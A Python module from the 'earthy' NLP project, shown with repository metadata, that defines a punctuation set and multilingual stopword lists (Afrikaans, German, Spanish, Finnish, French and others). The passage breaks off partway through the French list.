| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e9d8b5a198128b03e1b20f916a54a13a506755fc
| 112,962
|
py
|
Python
|
earthy/wordlist.py
|
alvations/earthy
|
29a4e01050a5fd46a0ad49cd0aedfd25cd8ba787
|
[
"Apache-2.0"
] | 6
|
2017-05-09T18:12:00.000Z
|
2017-12-22T16:26:35.000Z
|
earthy/wordlist.py
|
alvations/earthy
|
29a4e01050a5fd46a0ad49cd0aedfd25cd8ba787
|
[
"Apache-2.0"
] | 1
|
2017-05-09T05:40:32.000Z
|
2017-05-09T05:40:32.000Z
|
earthy/wordlist.py
|
alvations/earthy
|
29a4e01050a5fd46a0ad49cd0aedfd25cd8ba787
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import string
from charguana import get_charset
punctuations = set(list(string.punctuation) +
list(get_charset('Currency_Symbol')) +
list(get_charset('Close_Punctuation')) +
list(get_charset('Open_Punctuation')) +
list(get_charset('punctuation')))
# From https://raw.githubusercontent.com/6/stopwords-json/master/stopwords-all.json
stopwords = {"af":[u"'n",u"aan",u"af",u"al",u"as",u"baie",u"by",u"daar",u"dag",u"dat",u"die",u"dit",u"een",u"ek",u"en",u"gaan",u"gesê",u"haar",u"het",u"hom",u"hulle",u"hy",u"in",u"is",u"jou",u"jy",u"kan",u"kom",u"ma",u"maar",u"met",u"my",u"na",u"nie",u"om",u"ons",u"op",u"saam",u"sal",u"se",u"sien",u"so",u"sy",u"te",u"toe",u"uit",u"van",u"vir",u"was",u"wat",u"ʼn"],u"ha":[u"a",u"amma",u"ba",u"ban",u"ce",u"cikin",u"da",u"don",u"ga",u"in",u"ina",u"ita",u"ji",u"ka",u"ko",u"kuma",u"lokacin",u"ma",u"mai",u"na",u"ne",u"ni",u"sai",u"shi",u"su",u"suka",u"sun",u"ta",u"tafi",u"take",u"tana",u"wani",u"wannan",u"wata",u"ya",u"yake",u"yana",u"yi",u"za"],u"so":[u"aad",u"albaabkii",u"atabo",u"ay",u"ayaa",u"ayee",u"ayuu",u"dhan",u"hadana",u"in",u"inuu",u"isku",u"jiray",u"jirtay",u"ka",u"kale",u"kasoo",u"ku",u"kuu",u"lakin",u"markii",u"oo",u"si",u"soo",u"uga",u"ugu",u"uu",u"waa",u"waxa",u"waxuu"],u"st":[u"a",u"ba",u"bane",u"bona",u"e",u"ea",u"eaba",u"empa",u"ena",u"ha",u"hae",u"hape",u"ho",u"hore",u"ka",u"ke",u"la",u"le",u"li",u"me",u"mo",u"moo",u"ne",u"o",u"oa",u"re",u"sa",u"se",u"tloha",u"tsa",u"tse"],u"sw":[u"akasema",u"alikuwa",u"alisema",u"baada",u"basi",u"bila",u"cha",u"chini",u"hadi",u"hapo",u"hata",u"hivyo",u"hiyo",u"huku",u"huo",u"ili",u"ilikuwa",u"juu",u"kama",u"karibu",u"katika",u"kila",u"kima",u"kisha",u"kubwa",u"kutoka",u"kuwa",u"kwa",u"kwamba",u"kwenda",u"kwenye",u"la",u"lakini",u"mara",u"mdogo",u"mimi",u"mkubwa",u"mmoja",u"moja",u"muda",u"mwenye",u"na",u"naye",u"ndani",u"ng",u"ni",u"nini",u"nonkungu",u"pamoja",u"pia",u"sana",u"sasa",u"sauti",u"tafadhali",u"tena",u"tu",u"vile",u"wa",u"wakati",u"wake",u"walikuwa",u"wao",u"watu",u"wengine",u"wote",u"ya",u"yake",u"yangu",u"yao",u"yeye",u"yule",u"za",u"zaidi",u"zake"],u"yo":[u"a",u"an",u"bá",u"bí",u"bẹ̀rẹ̀",u"fún",u"fẹ́",u"gbogbo",u"inú",u"jù",u"jẹ",u"jẹ́",u"kan",u"kì",u"kí",u"kò",u"láti",u"lè",u"lọ",u"mi",u"mo",u"máa",u"mọ̀",u"ni",u"náà",u"ní",u"nígbà",u"nítorí",u"nǹkan",u"o",u"padà",u"pé",u"púpọ̀",u"pẹ̀lú",u"rẹ̀",u"sì",u"sí",u"sínú",u"ṣ",u"ti",u"tí",u"wà",u"wá",u"wọn",u"wọ́n",u"yìí",u"àti",u"àwọn",u"é",u"í",u"òun",u"ó",u"ń",u"ńlá",u"ṣe",u"ṣé",u"ṣùgbọ́n",u"ẹmọ́",u"ọjọ́",u"ọ̀pọ̀lọpọ̀"],u"zu":[u"futhi",u"kahle",u"kakhulu",u"kanye",u"khona",u"kodwa",u"kungani",u"kusho",u"la",u"lakhe",u"lapho",u"mina",u"ngesikhathi",u"nje",u"phansi",u"phezulu",u"u",u"ukuba",u"ukuthi",u"ukuze",u"uma",u"wahamba",u"wakhe",u"wami",u"wase",u"wathi",u"yakhe",u"zakhe",u"zonke"],u"da":[u"af",u"alle",u"andet",u"andre",u"at",u"begge",u"da",u"de",u"den",u"denne",u"der",u"deres",u"det",u"dette",u"dig",u"din",u"dog",u"du",u"ej",u"eller",u"en",u"end",u"ene",u"eneste",u"enhver",u"et",u"fem",u"fire",u"flere",u"fleste",u"for",u"fordi",u"forrige",u"fra",u"få",u"før",u"god",u"han",u"hans",u"har",u"hendes",u"her",u"hun",u"hvad",u"hvem",u"hver",u"hvilken",u"hvis",u"hvor",u"hvordan",u"hvorfor",u"hvornår",u"i",u"ikke",u"ind",u"ingen",u"intet",u"jeg",u"jeres",u"kan",u"kom",u"kommer",u"lav",u"lidt",u"lille",u"man",u"mand",u"mange",u"med",u"meget",u"men",u"mens",u"mere",u"mig",u"ned",u"ni",u"nogen",u"noget",u"ny",u"nyt",u"nær",u"næste",u"næsten",u"og",u"op",u"otte",u"over",u"på",u"se",u"seks",u"ses",u"som",u"stor",u"store",u"syv",u"ti",u"til",u"to",u"tre",u"ud",u"var"],u"de":[u"Ernst",u"Ordnung",u"Schluss",u"a",u"ab",u"aber",u"ach",u"acht",u"achte",u"achten",u"achter",u"achtes",u"ag",u"alle",u"allein",u"allem",u"allen",u"aller",u"allerdings",u"alles",u"allgemeinen",u"als",u"also",u"am",u"an",u"andere",u"anderen",u"andern",u"anders",u"au",u"auch",u"auf",u"aus",u"ausser",u"ausserdem",u"außer",u"außerdem",u"b",u"bald",u"bei",u"beide",u"beiden",u"beim",u"beispiel",u"bekannt",u"bereits",u"besonders",u"besser",u"besten",u"bin",u"bis",u"bisher",u"bist",u"c",u"d",u"d.h",u"da",u"dabei",u"dadurch",u"dafür",u"dagegen",u"daher",u"dahin",u"dahinter",u"damals",u"damit",u"danach",u"daneben",u"dank",u"dann",u"daran",u"darauf",u"daraus",u"darf",u"darfst",u"darin",u"darum",u"darunter",u"darüber",u"das",u"dasein",u"daselbst",u"dass",u"dasselbe",u"davon",u"davor",u"dazu",u"dazwischen",u"daß",u"dein",u"deine",u"deinem",u"deiner",u"dem",u"dementsprechend",u"demgegenüber",u"demgemäss",u"demgemäß",u"demselben",u"demzufolge",u"den",u"denen",u"denn",u"denselben",u"der",u"deren",u"derjenige",u"derjenigen",u"dermassen",u"dermaßen",u"derselbe",u"derselben",u"des",u"deshalb",u"desselben",u"dessen",u"deswegen",u"dich",u"die",u"diejenige",u"diejenigen",u"dies",u"diese",u"dieselbe",u"dieselben",u"diesem",u"diesen",u"dieser",u"dieses",u"dir",u"doch",u"dort",u"drei",u"drin",u"dritte",u"dritten",u"dritter",u"drittes",u"du",u"durch",u"durchaus",u"durfte",u"durften",u"dürfen",u"dürft",u"e",u"eben",u"ebenso",u"ehrlich",u"ei",u"ei,u",u"eigen",u"eigene",u"eigenen",u"eigener",u"eigenes",u"ein",u"einander",u"eine",u"einem",u"einen",u"einer",u"eines",u"einige",u"einigen",u"einiger",u"einiges",u"einmal",u"eins",u"elf",u"en",u"ende",u"endlich",u"entweder",u"er",u"erst",u"erste",u"ersten",u"erster",u"erstes",u"es",u"etwa",u"etwas",u"euch",u"euer",u"eure",u"f",u"folgende",u"früher",u"fünf",u"fünfte",u"fünften",u"fünfter",u"fünftes",u"für",u"g",u"gab",u"ganz",u"ganze",u"ganzen",u"ganzer",u"ganzes",u"gar",u"gedurft",u"gegen",u"gegenüber",u"gehabt",u"gehen",u"geht",u"gekannt",u"gekonnt",u"gemacht",u"gemocht",u"gemusst",u"genug",u"gerade",u"gern",u"gesagt",u"geschweige",u"gewesen",u"gewollt",u"geworden",u"gibt",u"ging",u"gleich",u"gott",u"gross",u"grosse",u"grossen",u"grosser",u"grosses",u"groß",u"große",u"großen",u"großer",u"großes",u"gut",u"gute",u"guter",u"gutes",u"h",u"habe",u"haben",u"habt",u"hast",u"hat",u"hatte",u"hatten",u"hattest",u"hattet",u"heisst",u"her",u"heute",u"hier",u"hin",u"hinter",u"hoch",u"hätte",u"hätten",u"i",u"ich",u"ihm",u"ihn",u"ihnen",u"ihr",u"ihre",u"ihrem",u"ihren",u"ihrer",u"ihres",u"im",u"immer",u"in",u"indem",u"infolgedessen",u"ins",u"irgend",u"ist",u"j",u"ja",u"jahr",u"jahre",u"jahren",u"je",u"jede",u"jedem",u"jeden",u"jeder",u"jedermann",u"jedermanns",u"jedes",u"jedoch",u"jemand",u"jemandem",u"jemanden",u"jene",u"jenem",u"jenen",u"jener",u"jenes",u"jetzt",u"k",u"kam",u"kann",u"kannst",u"kaum",u"kein",u"keine",u"keinem",u"keinen",u"keiner",u"kleine",u"kleinen",u"kleiner",u"kleines",u"kommen",u"kommt",u"konnte",u"konnten",u"kurz",u"können",u"könnt",u"könnte",u"l",u"lang",u"lange",u"leicht",u"leide",u"lieber",u"los",u"m",u"machen",u"macht",u"machte",u"mag",u"magst",u"mahn",u"mal",u"man",u"manche",u"manchem",u"manchen",u"mancher",u"manches",u"mann",u"mehr",u"mein",u"meine",u"meinem",u"meinen",u"meiner",u"meines",u"mensch",u"menschen",u"mich",u"mir",u"mit",u"mittel",u"mochte",u"mochten",u"morgen",u"muss",u"musst",u"musste",u"mussten",u"muß",u"mußt",u"möchte",u"mögen",u"möglich",u"mögt",u"müssen",u"müsst",u"müßt",u"n",u"na",u"nach",u"nachdem",u"nahm",u"natürlich",u"neben",u"nein",u"neue",u"neuen",u"neun",u"neunte",u"neunten",u"neunter",u"neuntes",u"nicht",u"nichts",u"nie",u"niemand",u"niemandem",u"niemanden",u"noch",u"nun",u"nur",u"o",u"ob",u"oben",u"oder",u"offen",u"oft",u"ohne",u"p",u"q",u"r",u"recht",u"rechte",u"rechten",u"rechter",u"rechtes",u"richtig",u"rund",u"s",u"sa",u"sache",u"sagt",u"sagte",u"sah",u"satt",u"schlecht",u"schon",u"sechs",u"sechste",u"sechsten",u"sechster",u"sechstes",u"sehr",u"sei",u"seid",u"seien",u"sein",u"seine",u"seinem",u"seinen",u"seiner",u"seines",u"seit",u"seitdem",u"selbst",u"sich",u"sie",u"sieben",u"siebente",u"siebenten",u"siebenter",u"siebentes",u"sind",u"so",u"solang",u"solche",u"solchem",u"solchen",u"solcher",u"solches",u"soll",u"sollen",u"sollst",u"sollt",u"sollte",u"sollten",u"sondern",u"sonst",u"soweit",u"sowie",u"später",u"startseite",u"statt",u"steht",u"suche",u"t",u"tag",u"tage",u"tagen",u"tat",u"teil",u"tel",u"tritt",u"trotzdem",u"tun",u"u",u"uhr",u"um",u"und",u"und?",u"uns",u"unser",u"unsere",u"unserer",u"unter",u"v",u"vergangenen",u"viel",u"viele",u"vielem",u"vielen",u"vielleicht",u"vier",u"vierte",u"vierten",u"vierter",u"viertes",u"vom",u"von",u"vor",u"w",u"wahr?",u"wann",u"war",u"waren",u"wart",u"warum",u"was",u"wegen",u"weil",u"weit",u"weiter",u"weitere",u"weiteren",u"weiteres",u"welche",u"welchem",u"welchen",u"welcher",u"welches",u"wem",u"wen",u"wenig",u"wenige",u"weniger",u"weniges",u"wenigstens",u"wenn",u"wer",u"werde",u"werden",u"werdet",u"weshalb",u"wessen",u"wie",u"wieder",u"wieso",u"will",u"willst",u"wir",u"wird",u"wirklich",u"wirst",u"wissen",u"wo",u"wohl",u"wollen",u"wollt",u"wollte",u"wollten",u"worden",u"wurde",u"wurden",u"während",u"währenddem",u"währenddessen",u"wäre",u"würde",u"würden",u"x",u"y",u"z",u"z.b",u"zehn",u"zehnte",u"zehnten",u"zehnter",u"zehntes",u"zeit",u"zu",u"zuerst",u"zugleich",u"zum",u"zunächst",u"zur",u"zurück",u"zusammen",u"zwanzig",u"zwar",u"zwei",u"zweite",u"zweiten",u"zweiter",u"zweites",u"zwischen",u"zwölf",u"über",u"überhaupt",u"übrigens"],u"es":[u"a",u"actualmente",u"acuerdo",u"adelante",u"ademas",u"además",u"adrede",u"afirmó",u"agregó",u"ahi",u"ahora",u"ahí",u"al",u"algo",u"alguna",u"algunas",u"alguno",u"algunos",u"algún",u"alli",u"allí",u"alrededor",u"ambos",u"ampleamos",u"antano",u"antaño",u"ante",u"anterior",u"antes",u"apenas",u"aproximadamente",u"aquel",u"aquella",u"aquellas",u"aquello",u"aquellos",u"aqui",u"aquél",u"aquélla",u"aquéllas",u"aquéllos",u"aquí",u"arriba",u"arribaabajo",u"aseguró",u"asi",u"así",u"atras",u"aun",u"aunque",u"ayer",u"añadió",u"aún",u"b",u"bajo",u"bastante",u"bien",u"breve",u"buen",u"buena",u"buenas",u"bueno",u"buenos",u"c",u"cada",u"casi",u"cerca",u"cierta",u"ciertas",u"cierto",u"ciertos",u"cinco",u"claro",u"comentó",u"como",u"con",u"conmigo",u"conocer",u"conseguimos",u"conseguir",u"considera",u"consideró",u"consigo",u"consigue",u"consiguen",u"consigues",u"contigo",u"contra",u"cosas",u"creo",u"cual",u"cuales",u"cualquier",u"cuando",u"cuanta",u"cuantas",u"cuanto",u"cuantos",u"cuatro",u"cuenta",u"cuál",u"cuáles",u"cuándo",u"cuánta",u"cuántas",u"cuánto",u"cuántos",u"cómo",u"d",u"da",u"dado",u"dan",u"dar",u"de",u"debajo",u"debe",u"deben",u"debido",u"decir",u"dejó",u"del",u"delante",u"demasiado",u"demás",u"dentro",u"deprisa",u"desde",u"despacio",u"despues",u"después",u"detras",u"detrás",u"dia",u"dias",u"dice",u"dicen",u"dicho",u"dieron",u"diferente",u"diferentes",u"dijeron",u"dijo",u"dio",u"donde",u"dos",u"durante",u"día",u"días",u"dónde",u"e",u"ejemplo",u"el",u"ella",u"ellas",u"ello",u"ellos",u"embargo",u"empleais",u"emplean",u"emplear",u"empleas",u"empleo",u"en",u"encima",u"encuentra",u"enfrente",u"enseguida",u"entonces",u"entre",u"era",u"eramos",u"eran",u"eras",u"eres",u"es",u"esa",u"esas",u"ese",u"eso",u"esos",u"esta",u"estaba",u"estaban",u"estado",u"estados",u"estais",u"estamos",u"estan",u"estar",u"estará",u"estas",u"este",u"esto",u"estos",u"estoy",u"estuvo",u"está",u"están",u"ex",u"excepto",u"existe",u"existen",u"explicó",u"expresó",u"f",u"fin",u"final",u"fue",u"fuera",u"fueron",u"fui",u"fuimos",u"g",u"general",u"gran",u"grandes",u"gueno",u"h",u"ha",u"haber",u"habia",u"habla",u"hablan",u"habrá",u"había",u"habían",u"hace",u"haceis",u"hacemos",u"hacen",u"hacer",u"hacerlo",u"haces",u"hacia",u"haciendo",u"hago",u"han",u"hasta",u"hay",u"haya",u"he",u"hecho",u"hemos",u"hicieron",u"hizo",u"horas",u"hoy",u"hubo",u"i",u"igual",u"incluso",u"indicó",u"informo",u"informó",u"intenta",u"intentais",u"intentamos",u"intentan",u"intentar",u"intentas",u"intento",u"ir",u"j",u"junto",u"k",u"l",u"la",u"lado",u"largo",u"las",u"le",u"lejos",u"les",u"llegó",u"lleva",u"llevar",u"lo",u"los",u"luego",u"lugar",u"m",u"mal",u"manera",u"manifestó",u"mas",u"mayor",u"me",u"mediante",u"medio",u"mejor",u"mencionó",u"menos",u"menudo",u"mi",u"mia",u"mias",u"mientras",u"mio",u"mios",u"mis",u"misma",u"mismas",u"mismo",u"mismos",u"modo",u"momento",u"mucha",u"muchas",u"mucho",u"muchos",u"muy",u"más",u"mí",u"mía",u"mías",u"mío",u"míos",u"n",u"nada",u"nadie",u"ni",u"ninguna",u"ningunas",u"ninguno",u"ningunos",u"ningún",u"no",u"nos",u"nosotras",u"nosotros",u"nuestra",u"nuestras",u"nuestro",u"nuestros",u"nueva",u"nuevas",u"nuevo",u"nuevos",u"nunca",u"o",u"ocho",u"os",u"otra",u"otras",u"otro",u"otros",u"p",u"pais",u"para",u"parece",u"parte",u"partir",u"pasada",u"pasado",u"paìs",u"peor",u"pero",u"pesar",u"poca",u"pocas",u"poco",u"pocos",u"podeis",u"podemos",u"poder",u"podria",u"podriais",u"podriamos",u"podrian",u"podrias",u"podrá",u"podrán",u"podría",u"podrían",u"poner",u"por",u"porque",u"posible",u"primer",u"primera",u"primero",u"primeros",u"principalmente",u"pronto",u"propia",u"propias",u"propio",u"propios",u"proximo",u"próximo",u"próximos",u"pudo",u"pueda",u"puede",u"pueden",u"puedo",u"pues",u"q",u"qeu",u"que",u"quedó",u"queremos",u"quien",u"quienes",u"quiere",u"quiza",u"quizas",u"quizá",u"quizás",u"quién",u"quiénes",u"qué",u"r",u"raras",u"realizado",u"realizar",u"realizó",u"repente",u"respecto",u"s",u"sabe",u"sabeis",u"sabemos",u"saben",u"saber",u"sabes",u"salvo",u"se",u"sea",u"sean",u"segun",u"segunda",u"segundo",u"según",u"seis",u"ser",u"sera",u"será",u"serán",u"sería",u"señaló",u"si",u"sido",u"siempre",u"siendo",u"siete",u"sigue",u"siguiente",u"sin",u"sino",u"sobre",u"sois",u"sola",u"solamente",u"solas",u"solo",u"solos",u"somos",u"son",u"soy",u"soyos",u"su",u"supuesto",u"sus",u"suya",u"suyas",u"suyo",u"sé",u"sí",u"sólo",u"t",u"tal",u"tambien",u"también",u"tampoco",u"tan",u"tanto",u"tarde",u"te",u"temprano",u"tendrá",u"tendrán",u"teneis",u"tenemos",u"tener",u"tenga",u"tengo",u"tenido",u"tenía",u"tercera",u"ti",u"tiempo",u"tiene",u"tienen",u"toda",u"todas",u"todavia",u"todavía",u"todo",u"todos",u"total",u"trabaja",u"trabajais",u"trabajamos",u"trabajan",u"trabajar",u"trabajas",u"trabajo",u"tras",u"trata",u"través",u"tres",u"tu",u"tus",u"tuvo",u"tuya",u"tuyas",u"tuyo",u"tuyos",u"tú",u"u",u"ultimo",u"un",u"una",u"unas",u"uno",u"unos",u"usa",u"usais",u"usamos",u"usan",u"usar",u"usas",u"uso",u"usted",u"ustedes",u"v",u"va",u"vais",u"valor",u"vamos",u"van",u"varias",u"varios",u"vaya",u"veces",u"ver",u"verdad",u"verdadera",u"verdadero",u"vez",u"vosotras",u"vosotros",u"voy",u"vuestra",u"vuestras",u"vuestro",u"vuestros",u"w",u"x",u"y",u"ya",u"yo",u"z",u"él",u"ésa",u"ésas",u"ése",u"ésos",u"ésta",u"éstas",u"éste",u"éstos",u"última",u"últimas",u"último",u"últimos"],u"et":[u"aga",u"ei",u"et",u"ja",u"jah",u"kas",u"kui",u"kõik",u"ma",u"me",u"mida",u"midagi",u"mind",u"minu",u"mis",u"mu",u"mul",u"mulle",u"nad",u"nii",u"oled",u"olen",u"oli",u"oma",u"on",u"pole",u"sa",u"seda",u"see",u"selle",u"siin",u"siis",u"ta",u"te",u"ära"],u"fi":[u"aiemmin",u"aika",u"aikaa",u"aikaan",u"aikaisemmin",u"aikaisin",u"aikajen",u"aikana",u"aikoina",u"aikoo",u"aikovat",u"aina",u"ainakaan",u"ainakin",u"ainoa",u"ainoat",u"aiomme",u"aion",u"aiotte",u"aist",u"aivan",u"ajan",u"alas",u"alemmas",u"alkuisin",u"alkuun",u"alla",u"alle",u"aloitamme",u"aloitan",u"aloitat",u"aloitatte",u"aloitattivat",u"aloitettava",u"aloitettevaksi",u"aloitettu",u"aloitimme",u"aloitin",u"aloitit",u"aloititte",u"aloittaa",u"aloittamatta",u"aloitti",u"aloittivat",u"alta",u"aluksi",u"alussa",u"alusta",u"annettavaksi",u"annetteva",u"annettu",u"ansiosta",u"antaa",u"antamatta",u"antoi",u"aoua",u"apu",u"asia",u"asiaa",u"asian",u"asiasta",u"asiat",u"asioiden",u"asioihin",u"asioita",u"asti",u"avuksi",u"avulla",u"avun",u"avutta",u"edelle",u"edelleen",u"edellä",u"edeltä",u"edemmäs",u"edes",u"edessä",u"edestä",u"ehkä",u"ei",u"eikä",u"eilen",u"eivät",u"eli",u"ellei",u"elleivät",u"ellemme",u"ellen",u"ellet",u"ellette",u"emme",u"en",u"enemmän",u"eniten",u"ennen",u"ensi",u"ensimmäinen",u"ensimmäiseksi",u"ensimmäisen",u"ensimmäisenä",u"ensimmäiset",u"ensimmäisiksi",u"ensimmäisinä",u"ensimmäisiä",u"ensimmäistä",u"ensin",u"entinen",u"entisen",u"entisiä",u"entisten",u"entistä",u"enää",u"eri",u"erittäin",u"erityisesti",u"eräiden",u"eräs",u"eräät",u"esi",u"esiin",u"esillä",u"esimerkiksi",u"et",u"eteen",u"etenkin",u"etessa",u"ette",u"ettei",u"että",u"haikki",u"halua",u"haluaa",u"haluamatta",u"haluamme",u"haluan",u"haluat",u"haluatte",u"haluavat",u"halunnut",u"halusi",u"halusimme",u"halusin",u"halusit",u"halusitte",u"halusivat",u"halutessa",u"haluton",u"he",u"hei",u"heidän",u"heihin",u"heille",u"heiltä",u"heissä",u"heistä",u"heitä",u"helposti",u"heti",u"hetkellä",u"hieman",u"hitaasti",u"hoikein",u"huolimatta",u"huomenna",u"hyvien",u"hyviin",u"hyviksi",u"hyville",u"hyviltä",u"hyvin",u"hyvinä",u"hyvissä",u"hyvistä",u"hyviä",u"hyvä",u"hyvät",u"hyvää",u"hän",u"häneen",u"hänelle",u"hänellä",u"häneltä",u"hänen",u"hänessä",u"hänestä",u"hänet",u"ihan",u"ilman",u"ilmeisesti",u"itse",u"itsensä",u"itseään",u"ja",u"jo",u"johon",u"joiden",u"joihin",u"joiksi",u"joilla",u"joille",u"joilta",u"joissa",u"joista",u"joita",u"joka",u"jokainen",u"jokin",u"joko",u"joku",u"jolla",u"jolle",u"jolloin",u"jolta",u"jompikumpi",u"jonka",u"jonkin",u"jonne",u"joo",u"jopa",u"jos",u"joskus",u"jossa",u"josta",u"jota",u"jotain",u"joten",u"jotenkin",u"jotenkuten",u"jotka",u"jotta",u"jouduimme",u"jouduin",u"jouduit",u"jouduitte",u"joudumme",u"joudun",u"joudutte",u"joukkoon",u"joukossa",u"joukosta",u"joutua",u"joutui",u"joutuivat",u"joutumaan",u"joutuu",u"joutuvat",u"juuri",u"jälkeen",u"jälleen",u"jää",u"kahdeksan",u"kahdeksannen",u"kahdella",u"kahdelle",u"kahdelta",u"kahden",u"kahdessa",u"kahdesta",u"kahta",u"kahteen",u"kai",u"kaiken",u"kaikille",u"kaikilta",u"kaikkea",u"kaikki",u"kaikkia",u"kaikkiaan",u"kaikkialla",u"kaikkialle",u"kaikkialta",u"kaikkien",u"kaikkin",u"kaksi",u"kannalta",u"kannattaa",u"kanssa",u"kanssaan",u"kanssamme",u"kanssani",u"kanssanne",u"kanssasi",u"kauan",u"kauemmas",u"kaukana",u"kautta",u"kehen",u"keiden",u"keihin",u"keiksi",u"keille",u"keillä",u"keiltä",u"keinä",u"keissä",u"keistä",u"keitten",u"keittä",u"keitä",u"keneen",u"keneksi",u"kenelle",u"kenellä",u"keneltä",u"kenen",u"kenenä",u"kenessä",u"kenestä",u"kenet",u"kenettä",u"kennessästä",u"kenties",u"kerran",u"kerta",u"kertaa",u"keskellä",u"kesken",u"keskimäärin",u"ketkä",u"ketä",u"kiitos",u"kohti",u"koko",u"kokonaan",u"kolmas",u"kolme",u"kolmen",u"kolmesti",u"koska",u"koskaan",u"kovin",u"kuin",u"kuinka",u"kuinkan",u"kuitenkaan",u"kuitenkin",u"kuka",u"kukaan",u"kukin",u"kukka",u"kumpainen",u"kumpainenkaan",u"kumpi",u"kumpikaan",u"kumpikin",u"kun",u"kuten",u"kuuden",u"kuusi",u"kuutta",u"kylliksi",u"kyllä",u"kymmenen",u"kyse",u"liian",u"liki",u"lisäksi",u"lisää",u"lla",u"luo",u"luona",u"lähekkäin",u"lähelle",u"lähellä",u"läheltä",u"lähemmäs",u"lähes",u"lähinnä",u"lähtien",u"läpi",u"mahdollisimman",u"mahdollista",u"me",u"meidän",u"meille",u"meillä",u"melkein",u"melko",u"menee",u"meneet",u"menemme",u"menen",u"menet",u"menette",u"menevät",u"meni",u"menimme",u"menin",u"menit",u"menivät",u"mennessä",u"mennyt",u"menossa",u"mihin",u"mikin",u"miksi",u"mikä",u"mikäli",u"mikään",u"milloin",u"milloinkan",u"minne",u"minun",u"minut",u"minä",u"missä",u"mistä",u"miten",u"mitä",u"mitään",u"moi",u"molemmat",u"mones",u"monesti",u"monet",u"moni",u"moniaalla",u"moniaalle",u"moniaalta",u"monta",u"muassa",u"muiden",u"muita",u"muka",u"mukaan",u"mukaansa",u"mukana",u"mutta",u"muu",u"muualla",u"muualle",u"muualta",u"muuanne",u"muulloin",u"muun",u"muut",u"muuta",u"muutama",u"muutaman",u"muuten",u"myöhemmin",u"myös",u"myöskin",u"myöskään",u"myötä",u"ne",u"neljä",u"neljän",u"neljää",u"niiden",u"niin",u"niistä",u"niitä",u"noin",u"nopeammin",u"nopeasti",u"nopeiten",u"nro",u"nuo",u"nyt",u"näiden",u"näin",u"näissä",u"näissähin",u"näissälle",u"näissältä",u"näissästä",u"näitä",u"nämä",u"ohi",u"oikea",u"oikealla",u"oikein",u"ole",u"olemme",u"olen",u"olet",u"olette",u"oleva",u"olevan",u"olevat",u"oli",u"olimme",u"olin",u"olisi",u"olisimme",u"olisin",u"olisit",u"olisitte",u"olisivat",u"olit",u"olitte",u"olivat",u"olla",u"olleet",u"olli",u"ollut",u"oma",u"omaa",u"omaan",u"omaksi",u"omalle",u"omalta",u"oman",u"omassa",u"omat",u"omia",u"omien",u"omiin",u"omiksi",u"omille",u"omilta",u"omissa",u"omista",u"on",u"onkin",u"onko",u"ovat",u"paikoittain",u"paitsi",u"pakosti",u"paljon",u"paremmin",u"parempi",u"parhaillaan",u"parhaiten",u"perusteella",u"peräti",u"pian",u"pieneen",u"pieneksi",u"pienelle",u"pienellä",u"pieneltä",u"pienempi",u"pienestä",u"pieni",u"pienin",u"puolesta",u"puolestaan",u"päälle",u"runsaasti",u"saakka",u"sadam",u"sama",u"samaa",u"samaan",u"samalla",u"samallalta",u"samallassa",u"samallasta",u"saman",u"samat",u"samoin",u"sata",u"sataa",u"satojen",u"se",u"seitsemän",u"sekä",u"sen",u"seuraavat",u"siellä",u"sieltä",u"siihen",u"siinä",u"siis",u"siitä",u"sijaan",u"siksi",u"silloin",u"sillä",u"silti",u"sinne",u"sinua",u"sinulle",u"sinulta",u"sinun",u"sinussa",u"sinusta",u"sinut",u"sinä",u"sisäkkäin",u"sisällä",u"siten",u"sitten",u"sitä",u"ssa",u"sta",u"suoraan",u"suuntaan",u"suuren",u"suuret",u"suuri",u"suuria",u"suurin",u"suurten",u"taa",u"taas",u"taemmas",u"tahansa",u"tai",u"takaa",u"takaisin",u"takana",u"takia",u"tapauksessa",u"tarpeeksi",u"tavalla",u"tavoitteena",u"te",u"tietysti",u"todella",u"toinen",u"toisaalla",u"toisaalle",u"toisaalta",u"toiseen",u"toiseksi",u"toisella",u"toiselle",u"toiselta",u"toisemme",u"toisen",u"toisensa",u"toisessa",u"toisesta",u"toista",u"toistaiseksi",u"toki",u"tosin",u"tuhannen",u"tuhat",u"tule",u"tulee",u"tulemme",u"tulen",u"tulet",u"tulette",u"tulevat",u"tulimme",u"tulin",u"tulisi",u"tulisimme",u"tulisin",u"tulisit",u"tulisitte",u"tulisivat",u"tulit",u"tulitte",u"tulivat",u"tulla",u"tulleet",u"tullut",u"tuntuu",u"tuo",u"tuolla",u"tuolloin",u"tuolta",u"tuonne",u"tuskin",u"tykö",u"tähän",u"tällä",u"tällöin",u"tämä",u"tämän",u"tänne",u"tänä",u"tänään",u"tässä",u"tästä",u"täten",u"tätä",u"täysin",u"täytyvät",u"täytyy",u"täällä",u"täältä",u"ulkopuolella",u"usea",u"useasti",u"useimmiten",u"usein",u"useita",u"uudeksi",u"uudelleen",u"uuden",u"uudet",u"uusi",u"uusia",u"uusien",u"uusinta",u"uuteen",u"uutta",u"vaan",u"vahemmän",u"vai",u"vaiheessa",u"vaikea",u"vaikean",u"vaikeat",u"vaikeilla",u"vaikeille",u"vaikeilta",u"vaikeissa",u"vaikeista",u"vaikka",u"vain",u"varmasti",u"varsin",u"varsinkin",u"varten",u"vasen",u"vasenmalla",u"vasta",u"vastaan",u"vastakkain",u"vastan",u"verran",u"vielä",u"vierekkäin",u"vieressä",u"vieri",u"viiden",u"viime",u"viimeinen",u"viimeisen",u"viimeksi",u"viisi",u"voi",u"voidaan",u"voimme",u"voin",u"voisi",u"voit",u"voitte",u"voivat",u"vuoden",u"vuoksi",u"vuosi",u"vuosien",u"vuosina",u"vuotta",u"vähemmän",u"vähintään",u"vähiten",u"vähän",u"välillä",u"yhdeksän",u"yhden",u"yhdessä",u"yhteen",u"yhteensä",u"yhteydessä",u"yhteyteen",u"yhtä",u"yhtäälle",u"yhtäällä",u"yhtäältä",u"yhtään",u"yhä",u"yksi",u"yksin",u"yksittäin",u"yleensä",u"ylemmäs",u"yli",u"ylös",u"ympäri",u"älköön",u"älä"],u"fr":[u"a",u"abord",u"absolument",u"afin",u"ah",u"ai",u"aie",u"ailleurs",u"ainsi",u"ait",u"allaient",u"allo",u"allons",u"allô",u"alors",u"anterieur",u"anterieure",u"anterieures",u"apres",u"après",u"as",u"assez",u"attendu